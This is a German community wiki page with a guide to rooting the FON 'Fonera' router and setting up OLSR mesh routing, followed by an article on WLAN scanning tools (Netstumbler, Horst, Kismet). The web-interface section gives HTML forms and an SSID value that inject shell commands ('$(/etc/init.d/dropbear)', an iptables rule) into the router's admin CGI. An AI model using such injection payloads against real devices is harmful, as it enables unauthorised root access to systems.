FunkFeuer Wiki - Benutzerbeiträge [de]

Fonera

2007-04-27T11:02:27Z

Cnagl: orthographie++

'''ACHTUNG, diese Seite ist noch längst nicht ausgereift und soll (erst) nur einen Anhaltspunkt sein'''

Adrian Dabrowski hat auf der Funkfeuer Convention am 24.11.2006 einen Vortrag über Hardware Hacking gehalten, in dem es auch um die Fonera ging. Die Folien kann man hier downloaden:

http://convention.funkfeuer.at/wp-content/uploads/funkfeuer-convention-hardware-hacking-adrian-dabrowski.pdf

=About=
Die Fonera ist ein Wlan Router, der von http://www.fon.com verwendet wird, um mit dem Internetzugang anderer Leute Geld zu verdienen.

Die Fonera kostet $/ 29,95 und ist damit eigendlich recht günstig.

es gibt schon einige Möglichkeiten die Fonera Firmware zu ändern,

zum Beispiel einfach das bestehende Betriebsystem verändern,

es gibt jedoch auch schon Lösungen die ein komplett neues Betriebssystem aufspielen.

Es wird wohl nicht mehr lange dauern, bis fertige Software zur Verfügung steht, wie es bei den Linksysen bekannt ist,
die Frage ist, ob FON nicht einiges dagegen unternehmen wird, z.b Änderung der Hardware.

Wichtig ist deshalb, dass man eine neue Fonera nicht erst ins Internet lässt, sondern gleich "bearbeitet"

===Nachteile===
* die Fonera ist eigendlich nicht dazu gedacht, dass man damit herumspielt, deshalb kommt man nur über Tricks hinein
* die Fonera hat ein extrem langsames Flash, das booten dauert länger als das Flashen bei einem WRT54GL ;-)
* die Pakete die es momentan gibt, sind fast alle experimentell, deshalb gibt es noch keine Webinterfaces etc. (es wird daran aber schon sehr intensiv gearbeit)
* die Originalfirmware ist auf USA eingestellt, damit sind nur die Kanäle 1-11 verfügbar, es wird daran gearbeitet...

=Systemeigenschaften im Originalzustand=

==Software==
* Linux 2.4.36
* 2 WIFI Netze
** Privat, WPA, Lokales LAN + Internet
** Public, Captive Portal, nur Internet
* Captive Portal: Chilli
* Phoning Home

==Hardware==
* MIPS CPU
* Router600mA @ 5V (3W)
* Atheros Chipset -> Linux MADWIFI
* PSMA Antenne, 2,2dbi
* Atheros -90/-93dbm.
zum Vergleich: Linksys -65dBm@54Mbps, -80dBm@11Mbps
* 8 MB Serial Flash / 16 MB Flash
* Low Cost

=Hacking=
es gibt 2 wesentliche Methoden, wie man in die Fonera kommt, das Ziel ist aber immer das Gleiche:

eine Konsole mit root-Rechten zu erhalten

Es ist nützlich, sich zuerst die Methoden anzusehen, und dann eine auszuwählen.

beide haben Vor- und Nachteile.
==Übersicht==
FON hat in die Fonera einiges an Software hineingepackt, die "nach Hause telefoniert", um Updates einzuspielen, und als Heartbeat, das gilt es erst mal zu deaktivieren, FON könnte ja Updates einspielen.

==Serielle Console==

Vorteile:
* dieser Hack wird wohl immer funktionieren, da er über die Hardware der Fonera geht
Nachteile:
* man muss sich erst eine Schaltung bauen bzw. von jemandem der bereits eine hat ausborgen.

die Fonera hat im Inneren eine Stiftleiste, auf der eine Serielle Konsole mit 3,3V pegel liegt.

[[Bild:Fonera_serial.jpg]]
* VCC (3.3V) red
* GND blue
* RX white
* TX orange

Aufgrund der 3,3V kann man die Fonera nicht direkt an einen PC anstecken, man braucht dazu erst einen Level Shifter.

Geeignet ist der '''MAX3232'''

Schaltbild:

[[Bild:Serial-max3232.gif]]

der MAX232, der einen konsolenpegel von 5V auf die Pegel des PCs bringt, funktioniert auch,
man muss nur Vcc auf die 5V des netzteils anstatt der 3,3V der Stiftleiste legen
eventuell kann man aber nur empfangen? die Fonera hat meinen ENTERs zumindest nicht Folge geleistet ;-)

und nun starten wir auf dem PC/Laptop etc einen seriellen Konsolenclient mit den Einstellungen:
Speed 9600,n,8,1

* Windows:
Start>Programme>Zubehoer>Kommunikation>HyperTerminal
und dann eine neue Verbindung mit den obigen Einstellungen

* Linux:
picocom -b 9600 /dev/ttyUSB0
gilt bei USB-RS232 Kabel. Gegebenenfalls /dev/ttyS0 ... bei seriellem Kabel.

Jetzt, wo wir Shell Zugriff haben, was machen wir nun?
===SSH Server===
als Erstes starten wir den SSH Server
/etc/init.d/dropbear start
Autostart für SSH Server einrichten
mv /etc/init.d/dropbear /etc/init.d/S50dropbear
===Firewall===
nun editieren wir die Firewall:
vi /etc/firewall.user

mit '''i''' in den Insert-Mode gehen

die # vor den folgenden Zeilen wegnehmen:
iptables -t nat -A prerouting_rule -i $WAN -p tcpdport 22 -j ACCEPT
iptables -A input_rule -i $WAN -p tcpdport 22 -j ACCEPT
'''ESC''' drücken, ''':wq''' eingeben und '''ENTER''' zum Speichern und den Editor zu verlassen

nun machen wir die Änderungen an der Firewall Aktiv:
/etc/firewall.user
===nach Hause telefonieren Teil 1===
Die Updatefunktion muss natürlich ausgeschaltet werden

hier editieren wir das Shell-Script, das das erledigt

vi /bin/thinclient

und machen bei der letzten Zeile ein # davor
# . /tmp/.thinclient.sh

das script startet sich ausserdem noch beim Systemstart,

also /etc/init.d/N40thinclient in z.b /etc/init.d/noN40thinclient umbenennen

mv /etc/init.d/N40thinclient /etc/init.d/noN40thinclient

===nach Hause telefonieren Teil 2===
Unser editiertes Shellscript wird jede Stunde aufgerufen, unser Edit hilft aber nur, das eigentliche Script, welches der Server schickt zu deaktivieren.

Wer sehen will, was FON mit der Fonera anstellen wollte, kann das was jetzt kommt gerne weglassen,
ich persöhnlich hasse allerdings Spionage.

also editieren wir den cronjob:

in der Datei '''/etc/crontabs/root''' ist original folgendes eingetragen:

0 * * * * /bin/thinclient cron

EDIT: seit einiger Zeit ist auch schon ein NTP Client dabei, der von ntp1.linuxmedialabs.com updatet.
Ev. auf '''at.pool.ntp.org''' ändern. (Das ist ein Serverpool, siehe http://pool.ntp.org)

das editieren wir zu
#0 * * * * /bin/thinclient cron
oder löschen den Eintrag ganz hinaus

wir könnten zwar auch den crond stoppen, allerdings braucht Sven-Ola's OLSR paket einen cronjob

===nach Hause telefonieren Teil 3===
ja, die FON-Leute sind echt nervend ;-)
es verbirgt sich noch ein kleiner Heartbeat in '''/etc/init.d/N10conncheck'''

also
vi /etc/init.d/N10conncheck

und folgende Zeilen auskommentieren oder löschen:

while [ -z "$(/usr/bin/wget "http://download.fon.com/heartbeat.php" -O-)" ]; do
sleep 1
done

==Webinterface==
Vorteile:
* der Hack kommt ohne Zugriff auf die Hardware aus.
Nachteile:
* Fon kann und wird bei neuen Patches die Sicherheitslöcher immer wieder zustopfen, also weis man nicht ob das mit neuen Foneras funktionieren wird.

''getestet mit 0.7.0 r4''

ACHTUNG: ich habe unlängst den Hack mit Version 0.7.1 r1 durchzuführen, hat nicht mehr funktioniert.
FON hat anscheinend (endlich, je nachdem wie man es sieht ^^) einen Patch dagegen aufgespielt
dieser hack funktioniert somit nur mit alten Versionen, am Besten ausprobieren
ansonsten kann man auch beim FONERA Hacking Part IV weiter gehn, das ging bei meiner Fonera.
Wie lang es dauert bis FON den bug gefixt kann keiner sagen, bei mir hats funktioniert (Mitte Jan 2007)
Bei höheren Firmware-Versionen den [[Fonera Hard Reset]] probieren

hier nutzen wir einen Bug im AdminInterface

der Trick ist, dass wir hier einen Bug ausnützen.
wir können nämlich in Eingabefeldern Befehle hineinschreiben, ohne dass die software das erkennt und abbricht.

bei einem marktreifen Produkt sollte sowas wirklich nicht sein!!

nahut, gehn wirs an.

dazu erstellen wir uns erst einmal 2 HTML files:

'''seite1.html:'''

<code><nowiki>
<html>
<head></head><body><center>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/usr/sbin/iptables -I INPUT 1 -p tcp dport 22 -j ACCEPT)" size="68" />
<input type="submit" name="submit" value="Submit" />
</form>
</center></body></html>
</nowiki></code>

'''seite2.html:'''

<code><nowiki>
<html>
<head></head><body><center>
<form method="post" action="http://169.254.255.1/cgi-bin/webif/connection.sh" enctype="multipart/form-data">
<input name="username" value="$(/etc/init.d/dropbear)" size="68" ><input type="submit" name="submit" value="Submit" />
</form>
</center></body></html>
</nowiki></code>

nun stellen wir die LAN-Verbindung des PC/Laptops ein:
IP: 169.254.255.2
Subnet mask: 255.255.255.0

nun kann es losgehen:

'''Seite 1''' aufrufen und auf Submit drücken.

am FON router einloggen
Default Login:
username: admin
passwort: admin

nun sieht man wahrscheinlich HTML quelltext im browser, auch das permission denied ganz oben ist normal.

nun '''Seite2''' aufrufen und auf Submit drücken.
===SSH Server===
wenn nun alles geklappt hat kann man mit putty auf '''169.254.255.1''' connecten.
dort als root und mit dem Passwort einloggen.

nun kommt im Grunde fast das Selbe wie bei Serieller Verbindung, nur dass wir einiges eben gerade eh schon gestartet haben.

Autostart für SSH Server einrichten
mv /etc/init.d/dropbear /etc/init.d/S50dropbear
===Firewall===
nun editieren wir die Firewall:
vi /etc/firewall.user

mit i in den Insert-Mode gehen

die # vor den folgenden Zeilen wegnehmen:
iptables -t nat -A prerouting_rule -i $WAN -p tcpdport 22 -j ACCEPT
iptables -A input_rule -i $WAN -p tcpdport 22 -j ACCEPT
ESC drücken, :wq eingeben und ENTER zum Speichern und den Editor zu verlassen

nun machen wir die Änderungen an der Firewall Aktiv:
/etc/firewall.user
===nach Hause telefonieren Teil 1===
Die Updatefunktion muss natürlich ausgeschaltet werden

hier editieren wir das Shell-Script, das das erledigt

vi /bin/thinclient

und machen bei der letzten Zeile ein # davor
# . /tmp/.thinclient.sh

das Script startet sich ausserdem noch beim Systemstart,

also /etc/init.d/N40thinclient in z.b /etc/init.d/noN40thinclient umbenennen

===nach Hause telefonieren Teil 2===
unser editiertes Shellscript wird jede Stunde aufgerufen, unser Edit hilft aber nur, das eigendliche Script, was der Server schickt zu deaktivieren.

wer sehen will, was FON mit der Fonera anstellen wollte, kann das was jetzt kommt gerne weglassen,
ich persöhnlich hasse allerdings Spionage.

also editieren wir den cronjob:

in der Datei '''/etc/crontabs/root''' ist original folgendes eingetragen:

0 * * * * /bin/thinclient cron

EDIT: seit einiger Zeit ist auch schon ein NTP Client dabei, der von ntp1.linuxmedialabs.com updatet.
Ev. auf '''at.pool.ntp.org''' ändern. (Das ist ein Serverpool, siehe http://pool.ntp.org)

das editieren wir zu
#0 * * * * /bin/thinclient cron
oder löschen den Eintrag ganz hinaus

wir könnten zwar auch den crond stoppen, allerdings braucht Sven-Ola's OLSR paket einen cronjob.

===nach Hause telefonieren Teil 3===
ja, die FON-Leute sind echt nervend ;-)
es verbirgt sich noch ein kleiner Heartbeat in '''/etc/init.d/N10conncheck'''

also
vi /etc/init.d/N10conncheck

und folgende Zeilen auskommentieren oder löschen:

while [ -z "$(/usr/bin/wget "http://download.fon.com/heartbeat.php" -O-)" ]; do
sleep 1
done

==FONERA Hacking Part IV by datacop :-)==

''getestet mit Firmware Version 0.7.0 r4 und 0.7.1 r1''<br>
''geht nicht mehr mit 0.7.1 r2'' -> downgrade auf Firmware Version 0.7.0 r4 mittels [[Fonera Hard Reset]]

ich hab durch ausprobieren einen weiteren Bug gefunden, der sehr elegant ist :-)

Addresseinstellungen wie bei obigen Hack:
IP: 169.254.255.2
Subnet mask: 255.255.255.0

der Trick:

bei Public Wireless Settings einfach in die SSID folgendes eintragen:

$(/etc/init.d/dropbear)

dann abschicken und schon kann man beim Webinterfacehack bei SSH Server weiter machen.

= OLSR =
'''Achtung: der untere Abschnitt dieser Seite kann noch einige bis viele Fehler enthalten ;-)'''

um die Fonera im FunkFeuer Netzwerk verwenden zu können, muss das routing Protokoll OLSR installiert werden.

== Vorarbeit ==
=== am Router ===
hier wird erst mal alles deaktiviert, was wir auf der Fonera eindeutig nicht brauchen können / haben wollen.

das wäre zum Ersten der '''Chillispot (Public WLAN)''', also
/etc/init.d/N50chillispot
z.b wie oben in noN50chillispot umbenennen

somit hätten wir das Public WLAN deaktiviert.

nun kommt das '''Private WLAN''' dran.
dies ist momentan nötig, da der WLAN driver einige Bugs hat, und das leider vor Allem im Ad-Hoc modus.

also öffnen wir ''/sbin/ifup'' im Editor und editieren folgende Zeilen (ziemlich am Ende):

case "$1" in
mgmt)
setup_management eth0
;;
lan|lan_noinet)
ifdown lan
#setup_lan_wifi << auskommentieren, so wie hier
ifconfig ath1 >/dev/null 2>/dev/null && {
setup_interface lan ath1
}
nun sollte nichts mehr im Wege stehen, OLSR und Ad-Hoc zu installieren / konfigurieren

natürlich muss zum installieren eine Internetverbindung aufgebaut sein, also sind die Schritte oben wichtig, dass man sich durch ein automatisches Update nicht selbst wieder aussperrt.

=== an Dokumentation ===

bevor man irgendwas an der Fonera installiert sollte man sich zu erst mal anschaun was das Ding eigendlich macht ;-)

also http://olsrexperiment.de/sven-ola/fonera/readme.txt durchlesen

ein sehr guter Rat:

'''!!! No warranties, no complaints. This is experimental stuff. If you want to remove the ff-fonera-pack, issue "rm -r /jffs/*" and reboot by pulling the plug. This restores the standard FON router function. !!!'''

== Installieren Variante I ==

erst prüfen wir, ob auch wirklich Internet und DNS funktionieren:
ping google.at

nun Sven-Ola's OLSR Pakete installieren:

ipkg install http://olsrexperiment.de/sven-ola/fonera/ff-fonera-pack_0.2-1_mips.ipk

das braucht reichlich Zeit, also wirklich abwarten bis alles fertig ist ;-)

zudem versucht die Fonera durch einen Falscheintrag in /etc/ipkg.conf auf 169.254.255.2 zu connecten (was natürlich nicht geht, da das eine Private IP ist):

src sven-ola ftp://169.254.255.2/upload/fonera

nach dem
Configuring kmod-madwifi...Done.

sollte die Fonera fertig sein, lieber noch eine Minute warten (zur Sicherheit) , und dann ist das Installieren fertig :-)

dadurch, dass die Prozesse im Hintergrund gestartet wurden wird man root@OpenWrt:~# erst sehen wenn man ENTER drückt.

== Installieren Variante II (neu) ==

erst prüfen wir, ob auch wirklich Internet und DNS funktionieren:
ping google.at

funktioniert der Ping, können wir weiter zur Paketinstallation übergehen:
ipkg install http://www.cybercomm.at/ff/mirror/ff-install_0.1_mips.ipk

mittels dieser Installation wird der Router mit den olsr Paketen bestückt.
Nun fehlt nurnoch ein Paket mit den Files (Webinterface, Einstellungen, usw..)
dazu Bitte nachstehenden Befehl eintippen:
ipkg install -force-overwrite http://www.cybercomm.at/ff/mirror/ff-files_0.1_mips.ipk

zuguterletzt danach noch einen reboot:
reboot

der router ist nach dem neustart unter folgendem Erreichbar:
IP: 193.238.158.125 (Bitte diese über das WebInterface Ändern)
WebInterface: http://193.238.158.125 (oder siehe: "FONERA Hacking Part IV")
Hostname: test (Bitte auf den jeweiligen Node-Namen umschreiben)
Kanal: 01
Bssid: 4E:FE:52:36:2E:65

den rest kann man natürlich auch anpassen (Kontaktdaten, usw..)

== Konfigurieren ==

=== S20madwifi-freifunk ===

als erstes öffnen wir ''/etc/init.d/S20madwifi-freifunk'' im Editor

nun ändern wir am Beginn IP, Netzmaske und BSSID.

export FF_IP=193.238.15x.x/22
export FF_BSSID=aa:bb:cc:dd:ee:ff

nun schaun wir uns die letzte Zeile an:

für eine Omni auf Kanal 1 würde das so aussehen:
iwconfig $FREIDEV mode ad-hoc essid freiesnetz.funkfeuer.at channel 1 key off frag off rts 250 ap $FF_BSSID

=== OLSR selbst ===

da es nicht sinnvoll ist, die OLSR Startdatei/Config bei jeder Fonera zu bearbeiten, machen wir unser eigenes Startscript:

erst benennen wir die originale ''/etc/init.d/S53olsrd'' in noS53olsrd um, damit nicht 2 OLSRds beim Booten starten (hat sehr interessante Auswirkungen ;-))

nun erstellen wir in ''/etc/init.d/'' eine Datei namens '''S81olsrd'''

Inhalt:

#!/bin/sh
test -n "$FAILSAFE" && exit
WIFIDEV=$(l=$(grep : /proc/net/wireless);echo ${l%%:*})
test -z "$WIFIDEV" && echo "No Wifi!">&2 && exit

test -d /etc/crontabs && cdir=/etc/crontabs
test -d /var/spool/cron/crontabs && cdir=/var/spool/cron/crontabs

case $1 in
start)
echo "Starting olsrd..."

test -d /var/etc || mkdir -p /var/etc
cat>>/var/etc/olsrd.conf<<EOF
DebugLevel 0
IpVersion 4
AllowNoInt yes
Pollrate 0.1
TcRedundancy 2
MprCoverage 7
LinkQualityFishEye 1
LinkQualityWinSize 50
LinkQualityDijkstraLimit 0 5.0
LoadPlugin "olsrd_txtinfo.so.0.1"
{
PlParam "Accept" "192.168.0.0/24"
}
IpcConnect
{
MaxConnections 1
Host 127.0.0.1
Net 192.168.0.0 255.255.255.0
}
LinkQualityLevel 2
UseHysteresis no
Interface "$WIFIDEV"
{
HelloInterval 5.0
HelloValidityTime 90.0
TcInterval 5.0
TcValidityTime 270.0
MidInterval 15.0
MidValidityTime 90.0
HnaInterval 15.0
HnaValidityTime 90.0
}
EOF
olsrd -f /var/etc/olsrd.conf

if [ -n "$cdir" ] && ! grep -q cron.olsrd $cdir/root; then
echo "0-59/1 * * * * /usr/sbin/cron.olsrd">>$cdir/root
echo "root" >> $cdir/cron.update
fi
;;
stop)
echo "Stopping olsrd..."

if [ -n "$cdir" ]; then
sed $cdir/root -e "/cron.olsrd/d">>$cdir/root.$$
mv $cdir/root.$$ $cdir/root
echo "root" >> $cdir/cron.update
fi

killall olsrd
;;
restart)
$0 stop
$0 start
;;
*)
echo "Usage: $0 start|stop|restart"
;;
esac

wenn alles funktioniert hat, ist die Fonera nun bereit, in das MeshNetz integriert zu werden.

aber Achung: immer schaun, dass der OLSR nur die externe IP per WLAN verbreitet, dass kann sonst üble Auswirkungen auf das ganze Netz haben.

=Über den Ethernet-Port der Fonera ins Netz - Dirty Hack=
== /etc/firewall.user ==
iptables -t nat -I PREROUTING -s 192.168.0.2 -j ACCEPT
iptables -t nat -I POSTROUTING -s 192.168.0.2 -j MASQUERADE
iptables -I INPUT -s 192.168.0.2 -j ACCEPT
iptables -I FORWARD -s 192.168.0.2 -j ACCEPT

== /etc/config/fon ==
#config network lan
# option mode static
# option ipaddr 192.168.10.1
# option netmask 255.255.255.0
# option dhcp 1

config network wan
option mode 'static'
option ipaddr '192.168.0.1'
option netmask '255.255.255.0'
# option gateway '192.168.0.1'
option dns '193.238.157.16'

== Client Konfiguration ==
IP: 192.168.0.2
Netmask: 255.255.255.0
Gateway: 192.168.0.1
DNS: 193.238.157.16

Voilá!

=Links=
http://jauzsi.hu/2006/10/13/inside-of-the-fonera

http://wiki.freifunk-hannover.de/Fonera_mit_OLSR - FreiFunk Hannover WIKI

http://www.mariomix.net/mariomix-blog/2006/11/hacking-la-fonera-parte-3/ - Hacking Part 3

http://www.notmart.org/index.php/BlaBla/Hacking_la_fonera..._part_III - noch eine Anleitung Hacking Part 3, englisch

http://bingobommel.blogspot.com/ - Hacking Part 2

http://olsrexperiment.de/sven-ola/fonera/ - Sven-Ola's Pakete, OLSR

http://fon.rogue.be/lafonera-0.7.0-rev4/

http://fon.rogue.be/lafonera/

http://fon.rogue.be/lafonera-experimental/

http://www.art-xtreme.com/blog/20061017/activar-ssh-en-la-fonera/ - Serieller Hack

http://www.easy2design.de/bla/?page_id=98 - Wenn der Fonera die KernelPanic-Krankheit hat: Debricking and more :)

http://www.dd-wrt.com/wiki/index.php/LaFonera_Software_Flashing#Flashing - Fonera auf DD-WRT flashen (expert section)

http://mrmuh.blogspot.com/2006/11/updates-explained-and-bridging-mode.html - Brigding mit der Fonera (Interessant für Nutzung als WLAN-AP oder im Client-Mode (bridge) )

http://www.dd-wrt.com/wiki/index.php/LaFonera_Hardware_32MB_SDRAM_MOD - Nette sahe fuer bastler ;o)

WlanScanTools

2007-04-24T20:22:33Z

Cnagl: Screenshot-Positionierung fixed; Layout etwas vereinheitlicht

= Netstumbler =

'''Betriebssystem:''' ab Windows 98; WIN CE: Ministumbler

'''Allgemeine Beschreibung:'''

Netsumbler ist ein WLAN-Scan-Tool für PC/Laptops mit integrierten WLAN bzw. PCMCIA/USB WLAN für Windows (ab Win98, für CE gibt es eine eigene Version den MiniStumbler) mit einigen Besonderheiten wie GPS Markierung und Text-to-Speech-Ausgabe.

=== Installation ===

Download über die Hompage von Netsumbler http://www.netstumbler.com/downloads/ [[Bild:Netstumbler.png]]

Nach dem Doppelklick auf das Item kommst Du zur "License Agreement". [[Bild:Netstumbler2.png]]

Nach sorgfältigem Durchlesen ;-) auf den Button "I Agree" drücken und Du kannst eine Auswahl der Komponenten treffen. [[Bild:Netstumbler3.png]]

Nach dem Drücken des Button "Next", kannst Du noch den Installationspfad festlegen und mit "Close" ist die Installation auch schon abgeschlossen!

[[Bild:Netstumbler4.png]] [[Bild:Netstumbler5.png]]

Danach werden noch die Release Notes angezeigt.

[[Bild:Netstumbler6.png]]

=== Starten und Benutzen von Netstumbler ===

Entweder über Start->Programme->Network Stumbler [[Bild:Netstumbler7.png]] oder über das Desktop Item Network Stumbler. [[Bild:Netstumbler8.png]]

Danach startet das Programm und sucht nach Deiner WLAN-Karte.
Findet es keinen Adapter, weil Du z.B. deine WLAN Karte nicht eingesteckt oder eingeschaltet hast, findest Du im Fuß des Programm-Windows die Nachricht "Adapter not present" [[Bild:Netstumbler9.png]] (Adapter aktivieren Programm schließen und nochmals starten), sonst zeigt Dir das Programm gleich mal alle aktiven Access Points an!

Hinweis:
Grün bedeutet AP ist aktiv
Rot bedeutet unerreichbar, aber unter Windows bei "bevorzugte Netzwerke" definiert
Grau bedeutet AP war aktiv

[[Bild:Netstumbler10.png]]

Auf der rechten Seite kannst Du die anzuzeigenden AP nach unterschiedlichen Eigenschaften filtern!
Wählst Du nun unter dem Menüpunkt Channels oder SSIDs eine MAC Adresse aus, so wird Dir der Empfangslevel angezeigt (Eigentlich wird dir die Signalstärke bezogen zur Noise (-100dbm) angezeigt)!

[[Bild:Netstumbler11.png]]

Über den Menüpunkt View->Options->General lässt sich die Scan Geschwindigkeit einstellen.
Über den Menüpunkt File->Save lässt sich der Scan abspeichern.

=== Links ===

http://www.netstumbler.com

http://de.wikipedia.org/wiki/Netstumbler

= HORST =

'''Betriebssystem:''' läuft direkt auf dem Funkfeuer-Router (Freifunk bzw. Openwrt Firmware)

'''Typ/Umgebung:''' Linux Konsolenapplikation

=== Allgemeine Beschreibung ===

''Horst'' steht für "Horsts OLSR Radio Scanning Tool" und wurde in der Berliner Freifunk Community entwickelt. ''Horst'' kann nützlich sein um die Verbindungsqualität und auch die OLSR-Kommunikation mit anderen Knoten zu analysieren. Um nach OLSR-Paketen zu filtern und übrige Pakete auszublenden kann der OLSR-Filter (Taste 'o') aktiviert werden. So kann man OLSR-Protokollabläufe relativ einfach mitverfolgen - zum Beispiel, ob die RTS/CTS Pakete eines Nachbarknoten auch empfangen werden oder nicht, und somit eine eventuelle Paketkollision dadurch ausschliessen. An interessanten Stellen kann die Paketanzeige mittels Taste 'p' pausiert werden.

''Horst'' zeigt für eine empfangene Station die jeweilige IP-Adresse, SNR (Signal-Noise-Ratio), SOURCE (Source-MAC), BSSID (Basic Service Set IDentifier), LQ (OLSR-LinkQuality), GW (eventuelle Gateway-Eigenschaft), NEIGH (Anzahl der Nachbarschaftsbeziehungen einer Station), OLSR/COUNT (Anzahl der OLSR-Pakete zu Gesamtepaketanzahl zu einer Station) sowie den TSF-Wert (Timer Synchronization Function) an. Im Frame rechts unten wird zusätzlich die SNR in Signal- und Rauschleistung geteilt dargestellt und kann somit bei der Ausrichtung einer Antenne sehr hilfreich sein.

=== Installation und Programmstart ===

Folgende Pakete sind zur Installation von ''Horst'' nötig und entweder mittels 'ipkg install <file.ipk>' oder Webinterface einzuspielen.

http://88.198.196.3/sven-ola/ipkg/packages/libncurses_5.2_mipsel.ipk

http://88.198.196.3/sven-ola/ipkg/packages/horst_1.2.2_mipsel.ipk

Gestartet wird ''Horst'' mittels Kommandozeilenaufruf in der Konsole. Da per Default-Installation die PATH-Variable für ''Horst'' gesetzt ist, reicht ein schlichtes 'horst' als Konsolenaufruf.

=== Interfacefunktionen ===
[p] Pause/Run
[s] Sortierung nach SNR (aktivieren/deaktivieren)
[c] Kontrollpakete (RTS/CTS/ACK/etc.) anzeigen (aktivieren/deaktivieren)
[o] OLSR Pakete filtern (aktivieren/deaktivieren)
[q] beenden

=== Screenshots ===

{| style="right; background:transparent; padding:0px; margin:0px; subst:Absatz"
|[[Bild:0xff_screenshot_horst_all_2.jpg|thumb|Bild1: ungefiltertes Capturing]]
|[[Bild:0xff_screenshot_horst_olsr_2.jpg|thumb|Bild2: OLSR Filter]]
|}

Bild1: ungefiltertes Capturing (mit Beacons, inkl. Beacons von !OLSR-Knoten zb. hier Station 'chome')

Bild2: OLSR Filter aktiv (LQ-Messages, HNA-Announces, etc.)

= KISMET =

'''Betriebssystem:''' läuft unter Linux oder als Drone direkt auf dem Funkfeuer-Router (Freifunk bzw. Openwrt Firmware)

'''Typ/Umgebung:''' Linux Konsolenapplikation

=== Einleitung ===

Kismet ist ein Wireless Lan tool, dass als Netzwerk- Finder/Sniffer/Intrusion Detection System Anwendung finden kann.
Es besteht aus einem Server und einem Client der die Daten des Servers graphisch aufbereitet.
Kismet ist sehr umfangreich und in diesem Wikieintrag kann leider nur an der Oberfläche dessen gekratzt werden, was mit Kismet möglich ist.

=== Installation ===

'''Source'''

Die Sourcen, dazugehörige Signatur sowie den gpg Key des Kismet Herausgebers kann man sich von http://www.kismetwireless.net/download.shtml herunterladen.

gpg --import dragorn.gpg
importiert den gpg-PublicKey des Kismetherausgebers in den eigenen Schlüsselbund

gpg --verify kismet-2007-01-R1b.tar.gz.asc kismet-2007-01-R1b.tar.gz
überprüfen ob das tar-file das ist, dass der Herausgeber online gestellt hat.

tar xvzf kismet-2007-01-R1b.tar.gz
entpackt das tar-file in das aktuelle Verzeichnis

cd kismet-2007-01-R1b
wechselt in das Verzeichnis kismet-2007-01-R1b

./configure
=> hier darauf achten das keine Fehlermeldungen kommen, eventuell benötigte Libraries nachinstallieren

make

sudo make install (falls nur root Kismet aufrufen sollte)
oder sudo make suidinstall (falls alle Benutzer Kismet aufrufen dürfen,
man sollte jedoch im Hinterkopf behalten, das ein Programm bei dem das Suidbit gesetzt ist ein mögliches Sicherheitsrisiko darstellen kann
(http://de.wikipedia.org/wiki/Setuid))

'''Debian'''

sudo aptitude update
sudo aptitude install kismet

Unter Debian kann Kismet (wenn er über aptitude installiert wird) default mäßig nur als root gestartet werden, da dies auf
einem Mehrbenutzersystem meist als sicherer anzusehen ist => siehe suid.)

'''Gentoo''', '''SuSe''', '''Fedora''', '''Ubuntu''', '''Wrt54g(Drone)'''

ssh root@ip_deines_routers
ipkg update
ipkg install kismet-drone
cd /etc/kismet/
vi kismet_drone.conf (=> siehe Abschnitt Drone)
cd /usr/bin
wl monitor 1
./kismet_drone
mit STRG C abbrechen
wl monitor 0
fertig

Man sollte auch beachten, dass Kismet und OLSR nicht gemeinsam funktionieren, man wird daher beim Starten der Drone aus dem 0xff Netz geworfen.
Es ist daher von Vorteil, sich über Lan zum Router zu verbinden.

=== kismet.conf ===

Das Konfigurationsfile für Kismet liegt defaultmäßig im Verzeichniss /etc/Kismet/ und kann mit jedem beliebigen Editor bearbeitet werden.

Die wichtigsten Optionen die hier geändert werden müssen sind:

'''suiduser='''
Hier kann angegeben werden, als welcher Benutzer Kismet später laufen soll, damit diese Option zur Verfügung steht, muss Kismet jeodch mit make suidinstall installiert
worden sein.

'''source= 1,2,3,(4)'''
1= Der Name des Wirelessmodules, dass man am leichtesten unter http://www.kismetwireless.net/documentation.shtml in Erfahrung bringt.
2= Der Name des Wirelessinterfaces, z.B: eth1
3= Der Name für diesen Datenstrom, diese Option ist nur bei mehreren Quellen interessant, und kann auf einen beliebigen Namen gesetzt sein.
4= gänzlich optional, hier kann, falls gewünscht, der default Start Channel angegeben werden (falls channelhopping aktiviert ist) bzw.
falls kein Channelhoping aktiviert ist, kann hier der gewünschte Channel eingestellt werden.

'''channelhop='''
Bei dieser Option kann eingestellt werden ob Kismet regelmäßig durch alle Channels des Wlanspektrums "hüpft" oder ob er nur auf einen Channel bleibt.

'''defaultchannels= '''
hier wird angeraten, nicht die US Channelvorgaben zu benutzen, da in Österreich auch die Channels 11,12,13 in Benutzung sind.

'''logdefault='''
Hier kann angegeben werden wie das logfile heisen soll.
durch das logtemplate werden dann Files vom Format NameDatumFortlaufendeNummer.logtype in /var/log/kismet/ erzeugt.

=== Bedienung ===

Die Bedienung von Kismet erscheint am Anfang etwas schwierig, nach einer kurzen Eingewöhnungsphase sind diese Bedenken meist vergessen. Im Startfenster werden die empfangenen Netzwerke im "Autofit" Modus angezeigt, um diesen Modus zu verlassen "s" drücken, und auswählen nach welchen Kriterien die Netzwerke jetzt sortiert werden sollten.

Hier eine kurze Auflistung der interessantesten Tasten für Kismet:

"s" um den derzeigigen Gruppierungsmodus umzustellen
"h" zeigt eine Quick Reference für Kismet
"q" mit q verlässt man immer das aktuelle PopUp.
"i" zeigt mehr Informationen über das gewählte Netzwerk.
"c" zeigt eine Liste der clients der Gruppe an.
"r" zeigt einen Packet Rate Graphen des Netzwerkverkehrs an.
"w" zeigt die Warnings für das Netzwerk an.
"p" zeigt die packets an, die gerade über das Netzwerk gehen
"a" zeigt eine allgemeine Statistik der Netzwerke an.
"d" dumpt strings aus dem gerade aktellen Datenstream
"f" zeigt die GPS daten (falls vorhanden)
"g" mit g kann man dem Netzwerk Namen geben
"l" zeigt den Powerlevel der Karte an (falls man eine Karte benutzt)
"m" mit m kann man den Sound auf lautlos stellen/ wieder anstellen

=== Kismet-Drone ===

Der Stream der Drone wird an den Server unverschlüsselt übertragen, es ist daher in nicht "vertrauenswürdiger" Umgebung
zu empfehlen den Stream verschlüsselt zu übertragen (z.B: mit ssh tunneln).

Die Kismetdrone wird über das File kisemt_drone.conf in /etc/kismet/ konfiguriert.

Der Großteil der Optionen wurden schon unter dem Punkt kismet.conf erklärt.

Die wichtigsten dronenspezifischen Optionen sind:

'''tcpport='''
Hier kann der Port angegeben werden, an dem die Drone die Daten liefert, es wird empfohlen diesen Port auf einen anderen wie den den des Servers zu setzen, falls beide auf einem System laufen.

'''allowedhosts='''
